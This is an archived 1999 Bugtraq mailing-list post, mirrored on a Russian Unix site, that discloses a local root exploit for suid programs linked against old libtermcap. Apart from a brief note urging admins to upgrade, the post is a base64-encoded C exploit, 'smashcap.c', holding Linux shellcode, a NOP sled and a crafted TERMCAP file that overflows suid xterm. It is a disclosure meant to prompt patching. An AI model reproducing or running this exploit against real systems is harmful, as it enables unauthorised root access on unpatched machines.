BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Новость: Увеличиваем производительность приложений использующих mod_perl SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Thu, 19 Aug 1999 08:56:14 -0500
From: sk8 <sk8@LUCID-SOLUTIONS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: local libtermcap exploit

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---725540659-895332205-935070974=:26359
Content-Type: TEXT/PLAIN; charset=US-ASCII


	Well, I wrote this a little while back.  This is a serious bug,
so people should be able to test their systems properly.  All admins
should definitely upgrade to the newest libtermcap.

				- sk8 of LS




---725540659-895332205-935070974=:26359
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="smashcap.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.990819085614.26359B@radical.org>
Content-Description:

LyogTG9jYWwgZXhwbG9pdCBmb3Igc3VpZCByb290IHByb2dyYW1zIGxpbmtl
ZCB0byBsaWJ0ZXJtY2FwIDwgMi4wLjgtMTUgDQogKg0KICogdGVzdGVkIHdp
dGggeHRlcm0gYW5kIG54dGVybSBvbiBSZWRIYXQgNS4yIGFuZCA0LjINCiAq
DQogKiBzazhAbHVjaWQtc29sdXRpb25zLmNvbQ0KICogaHR0cDovL3d3dy5s
dWNpZC1zb2x1dGlvbnMuY29tDQogKg0KICogVXNhZ2U6DQogKiAuL3NtYXNo
Y2FwICAJCS1kZWZhdWx0IGlzIGJ1ZmZlciBzaXplIG9mIDQyMTAgYW5kIG9m
ZnNldCBvZiAzMDANCiAqCQkJIGFuZCBzZWVtcyB0byB3b3JrIG9uIFJIIDUu
Mg0KICoNCiAqIEFkanVzdCBvZmZzZXRzIChzb21ld2hlcmUgYmV0d2VlbiAy
MzAgLSAxMTQwKSBpZiBuZWNlc3NhcnkNCiAqDQogKiAuL3NtYXNoY2FwIDxv
ZmZzZXQ+IAktYnVmZmVyIHNpemUgZGVmYXVsdHMgdG8gNDIxMA0KICogLi9z
bWFzaGNhcCA8b2Zmc2V0PiA8YnVmZmVyc2l6ZT4NCiAqDQogKg0KICogSW4g
b3JkZXIgdG8gc3RvcCBzY3JpcHQga2lkcy9vcHBvcnR1bmlzdHMsIG9uZSBN
SU5PUiBjaGFuZ2UgbXVzdCBiZQ0KICogbWFkZSBpbiBvcmRlciBmb3IgdGhp
cyB0byB3b3JrLiAgDQogKg0KICogVXNlIG9ubHkgdG8gdGVzdCB5b3VyIG1h
Y2hpbmVzIHRvIHNob3cgeW91IHRoYXQgeW91IG11c3QgcGF0Y2ggbGlidGVy
bWNhcC4NCiAqIFF1aWNrIGZpeCwgY2htb2QgdS1zIEFMTCBzdWlkIHJvb3Qg
cHJvZ3JhbXMgbGlua2VkIHdpdGggbGlidGVybWNhcC4NCiAqDQogKgkJCQkJ
CS0gc2s4IG9mIExTDQogKg0KICovDQoNCiNpbmNsdWRlIDxzdGRsaWIuaD4N
CiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0KDQoj
ZGVmaW5lIGZpbGVuYW1lICIvdG1wL2xzdGVybWNhcCINCiNkZWZpbmUgZW50
cnkxICAgInh0ZXJtfCINCiNkZWZpbmUgREVGQVVMVF9CVUZTSVpFIDQyMTAN
Cg0KY2hhciBzaGVsbGNvZGVbXSA9DQogICJceGViXHgxZlx4NWVceDg5XHg3
Nlx4MDhceDMxXHhjMFx4ODhceDQ2XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBi
Ig0KICAiXHg4OVx4ZjNceDhkXHg0ZVx4MDhceDhkXHg1Nlx4MGNceGNkXHg4
MFx4MzFceGRiXHg4OVx4ZDhceDQwXHhjZCINCiAgIlx4ODBceGU4XHhkY1x4
ZmZceGZmXHhmZlx4ZmYvYmluL3NoIjsgLyogTGludXggc2hlbGxjb2RlICov
DQoNCmxvbmcgZ2V0X3NwKHZvaWQpDQp7DQogICBfX2FzbV9fKCJtb3ZsICVl
c3AsICVlYXhcbiIpOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAq
YXJndltdKSB7DQogICBpbnQgYnVmc2l6ZSwgb2Zmc2V0LCBpLCBmZDsNCiAg
IGxvbmcgKmJ1ZnB0cjsNCiAgIGNoYXIgKnB0ciwgKmJ1ZmZlciwgKnRlbXBi
dWY7DQoNCiAgIHNldGVudigiVEVSTUNBUCIsICIvdG1wL2xzdGVybWNhcCIs
IDEpOw0KDQoNCiAgIGJ1ZnNpemU9REVGQVVMVF9CVUZTSVpFOw0KDQogICBp
ZiAoYXJnYyA+IDIpIGJ1ZnNpemU9YXRvaShhcmd2WzJdKTsNCiAgIGlmIChh
cmdjID4gMSkgb2Zmc2V0PWF0b2koYXJndlsxXSk7DQogICBlbHNlIG9mZnNl
dD0zMDA7DQogIA0KDQogICBwcmludGYoImJ1ZnNpemU6ICVpXG5vZmZzZXQ6
ICVpXG4iLCBidWZzaXplLG9mZnNldCk7DQoNCiAgIGlmKCEoYnVmZmVyID0g
bWFsbG9jKGJ1ZnNpemUpKSkgew0KICAgICAgcHJpbnRmKCJjYW4ndCBhbGxv
Y2F0ZSBlbm91Z2ggbWVtb3J5XG4iKTsNCiAgICAgIGV4aXQoMCk7DQogICB9
DQogIGlmKCEodGVtcGJ1ZiA9IG1hbGxvYyhidWZzaXplK3N0cmxlbihlbnRy
eTEpICkpKSB7DQogICAgICBwcmludGYoImNhbid0IGFsbG9jYXRlIGVub3Vn
aCBtZW1vcnlcbiIpOw0KICAgICAgZXhpdCgwKTsNCiAgIH0NCg0KICAgcHJp
bnRmKCJnZXRfc3AoKTogMHgleFxuIiwgZ2V0X3NwKCkpOw0KICAgcHJpbnRm
KCJnZXRfc3AoKS1vZmZzOiAweCV4XG4iLCAoZ2V0X3NwKCktb2Zmc2V0KSAp
Ow0KDQogICBwdHI9YnVmZmVyOw0KICAgYnVmcHRyID0gKGxvbmcgKikoYnVm
ZmVyKzIpOyAvKiBhbGlnbiAqLw0KDQogICBmb3IgKGkgPSAwOyBpIDwgYnVm
c2l6ZTsgaSArPSA0KQ0KICAgICAgCSooYnVmcHRyKyspID0gKGdldF9zcCgp
LW9mZnNldCk7DQoNCiAgIAlmb3IgKGkgPSAwOyBpIDwgKGJ1ZnNpemUvMik7
IGkrKykgDQogICAgIAkJIGJ1ZmZlcltpXSA9IDB4OTA7DQoNCglwdHI9YnVm
ZmVyICsgKChidWZzaXplLzIpIC0gc3RybGVuKHNoZWxsY29kZSkvMik7DQog
IAlmb3IgKGkgPSAwOyBpIDwgc3RybGVuKHNoZWxsY29kZSk7IGkrKykNCiAg
ICAgIAkJKihwdHIrKykgPSBzaGVsbGNvZGVbaV07IC8vc2hlbGxjb2RlDQoN
Cg0KICAJcHRyPXB0cisyNDsNCg0KCS8qIG5vdyBpbnNlcnQgdGhlIGNoYXJh
Y3RlcnMgOiBhbmQgXCBpbnRvIHRoZSB0ZXJtY2FwIC0gdGhlc2UgYXJlIHZp
dGFsICovDQogIAkqKHB0cisrKT0weDNhOyAgDQogIAkqKHB0cisrKT0weDVj
OyAgDQoNCg0KICAgCXNucHJpbnRmKHRlbXBidWYsIChidWZzaXplK3N0cmxl
bihlbnRyeTEpKSwgIiVzJXMlcyIsIGVudHJ5MSwgYnVmZmVyKTsNCiAgIAlm
ZCA9IG9wZW4oZmlsZW5hbWUsIE9fV1JPTkxZfE9fQ1JFQVR8T19UUlVOQywg
MDY2Nik7DQogICAJd3JpdGUgKGZkLCB0ZW1wYnVmLCBzdHJsZW4odGVtcGJ1
ZikpOw0KICAgCWNsb3NlKGZkKTsNCglwcmludGYoIm1hZGUgdGVybWNhcFxu
Iik7DQoNCglleGVjbCgiL3Vzci9YMTFSNi9iaW4veHRlcm0iLCJ4dGVybSIs
IDApOw0KCQ0KfQ0K
---725540659-895332205-935070974=:26359--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД